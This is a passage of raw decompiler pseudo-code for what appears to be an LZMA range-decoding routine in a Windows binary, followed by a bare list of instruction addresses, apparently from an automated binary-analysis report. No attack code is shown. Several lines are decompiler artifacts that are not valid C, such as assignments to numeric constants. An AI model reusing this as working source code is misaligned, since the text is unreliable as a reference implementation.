											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00407068
0x00407068
0x0040706c
0x00407095
0x0040709f
0x0040706e
0x00407077
0x00407084
0x00407087
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
